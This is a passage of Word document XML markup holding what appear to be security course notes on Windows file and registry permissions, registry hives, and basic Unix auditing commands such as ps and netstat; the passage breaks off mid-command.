                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Traverse folder allow moving through folders to reach other files or folders, even if the user has no permissions for the traversed folders. Traverse folder takes effect only when the group or user is not granted the Bypass traverse checking user right in the Group Policy snap-in. (By default, the Everyone group is given the Bypass traverse checking user right.) Execute File allows or denies running program files (applies to files only).</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Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00510A5D" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00510A5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Allows viewing the attributes of a file or folder, such as read-only and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Extended Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00510A5D" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00510A5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Read Extended Attributes Allows or denies viewing the extended attributes of a file or folder. Extended attributes are defined by programs and may vary by program.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Create Files / Write Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00510A5D" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00510A5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Create Files allows or denies creating files within the folder (applies to folders only). Write Attributes Allows or denies changing the attributes of a file or folder, such as read-only or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Create Folders / Append Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00BC0E92" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC0E92">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Create Folders allows or denies creating folders within the folder (applies to folders only). Append Data allows or denies making changes to the end of the file but not changing, deleting, or overwriting existing data (applies to files only).</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Write Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00BC0E92" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC0E92">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Write Attributes Allows or denies changing the attributes of a file or folder, such as read-only or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Write Extended Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00BC0E92" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC0E92">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Write Extended Attributes Allows or denies changing the extended attributes of a file or folder. Extended attributes are defined by programs and may vary by program.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Delete Subfolders and Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00680D3A" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00680D3A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Delete Subfolders and Files Allows or denies deleting subfolders and files, even if the Delete permission has not been granted on the subfolder or file. (applies to folders)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lastRenderedPageBreak/>
              <w:t>Delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00680D3A" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00680D3A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Delete Allows or denies deleting the file or folder. If you don't have Delete permission on a file or folder, you can still delete it if you have been granted Delete Subfolders and Files on the parent folder.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Permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00680D3A" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00680D3A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Read Permissions Allows or denies reading permissions of the file or folder, such as Full Control, Read, and Write.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Change Permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00E67549" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67549">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Change Permissions Allows or denies changing permissions of the file or folder, such as Full Control, Read, and Write.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B665F9" w:rsidTr="00B665F9">
        <w:trPr>
          <w:trHeight w:val="80"/>
        </w:trPr>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Take Ownership</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="00E67549" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67549">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Take Ownership Allows or denies taking ownership of the file or folder. The owner of a file or folder can always change permissions on it, regardless of any existing permissions that protect the file or folder.  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B13b - Analysing registry ACLs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRPr="003D26E6" w:rsidRDefault="00B665F9" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D26E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows applied ACLs to the registry in the same ways as with files and all objects within the windows operating system. ACLs can be applied to HIVES, keys, and sub</w:t>
      </w:r>
      <w:r w:rsidR="003D26E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="003D26E6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>keys but not individual entries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45D05" w:rsidRPr="003D26E6" w:rsidRDefault="00C45D05" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C45D05" w:rsidRPr="003D26E6" w:rsidRDefault="00C45D05" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D26E6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Registry permissions</w:t>
      </w:r>
      <w:r w:rsidR="00D06E2C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> settings</w:t>
      </w:r>
      <w:r w:rsidRPr="003D26E6">
        <w:rPr>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Query Value  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C45D05" w:rsidRPr="003D26E6" w:rsidRDefault="003D26E6" w:rsidP="003D26E6">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Permission </w:t>
            </w:r>
            <w:r w:rsidR="00C45D05" w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">to read a entry from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Set Value  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C45D05" w:rsidRPr="003D26E6" w:rsidRDefault="003D26E6" w:rsidP="003D26E6">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Permission </w:t>
            </w:r>
            <w:r w:rsidR="00C45D05" w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">to set entries in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Create Subkey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create subkeys on a selected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Enumerate Subkeys </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C45D05" w:rsidRPr="003D26E6" w:rsidRDefault="00C45D05" w:rsidP="003D26E6">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003D26E6" w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Permission</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to identify the subkeys of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Notify </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C45D05" w:rsidRPr="003D26E6" w:rsidRDefault="003D26E6" w:rsidP="003D26E6">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Permission to receive </w:t>
            </w:r>
            <w:r w:rsidR="00C45D05" w:rsidRPr="003D26E6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">notification events from a key in the registry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Create Link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create a symbolic link in a particular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Delete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delete a registry object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Write DAC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write a discretionary access control list on the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Write Owner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change the owner of the selected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Read Control  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6724" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D06E2C"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open the discretionary access control list on a key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows Registry Hives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT (HKCR)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tores information about registered applications, such as file associations and OLE Object Class IDs, tying them to the applications used to handle these items. On Windows 2000 and above, HKCR is a compilation of user-based HKCU\Software\Classes and machine-based HKLM\Software\Classes. If a given value exists in both of the subkeys above, the one in HKCU\Softwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re\Classes takes precedence. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER (HKCU)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tores settings that are specific to the currently logged-in user.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The HKCU key is a link to the subkey of HKEY_USERS that corresponds to the user; the same information is accessible in both locations. On Windows- NT based systems, each user's settings are stored in their own files called NTUSER.DAT and USRCLASS.DAT inside their own Documents and Settings subfolder. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE (HKLM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tores settings that are spe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cific to the local computer.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>On NT-based versions of Windows, HKLM contains four subkeys, SAM, SECURITY, SOFTWARE and SYSTEM, that are found within their respective files located in the %SystemRoot%\System32\config folder. A fifth subkey, HARDWARE, is volatile and is created dynamically, and as such is not stored in a file. Information about system hardware drivers and services are located under the SYSTEM subkey, while the SOFTWARE subkey contains software and Windows settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HKEY_USERS (HKU)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ontains subkeys corresponding to the HKEY_CURRENT_USER keys for each user profile actively loaded on the machine, though user hives are usually only loaded for currently logged-in users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_CONFIG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D06E2C" w:rsidRPr="00D06E2C" w:rsidRDefault="00D06E2C" w:rsidP="00D06E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06E2C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ontains information gathered at runtime; information stored in this key is not permanently stored on disk, but rather regenerated at the boot time. It is a link to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRDefault="008876A5" w:rsidP="00B50C46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">B14 - </w:t>
      </w:r>
      <w:r w:rsidRPr="008876A5">
        <w:t>Audit Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="008876A5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRPr="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B14a - </w:t>
      </w:r>
      <w:r w:rsidRPr="008876A5">
        <w:t>Listing processes and their asso</w:t>
      </w:r>
      <w:r>
        <w:t>ciated network sockets (if any)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00353DCC" w:rsidRDefault="000A257D" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353DCC" w:rsidRPr="00353DCC" w:rsidRDefault="00353DCC" w:rsidP="00353DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Processes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00353DCC" w:rsidRDefault="000A257D"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ps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –ef</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A257D" w:rsidRPr="00353DCC" w:rsidRDefault="00596356"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ps</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353DCC" w:rsidRPr="00353DCC" w:rsidRDefault="00353DCC" w:rsidP="00353DCC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Network services/connections:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353DCC" w:rsidRP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netstat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –na</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--tcp or –-udp for just that protocol </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353DCC" w:rsidRP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netstat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00353DCC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
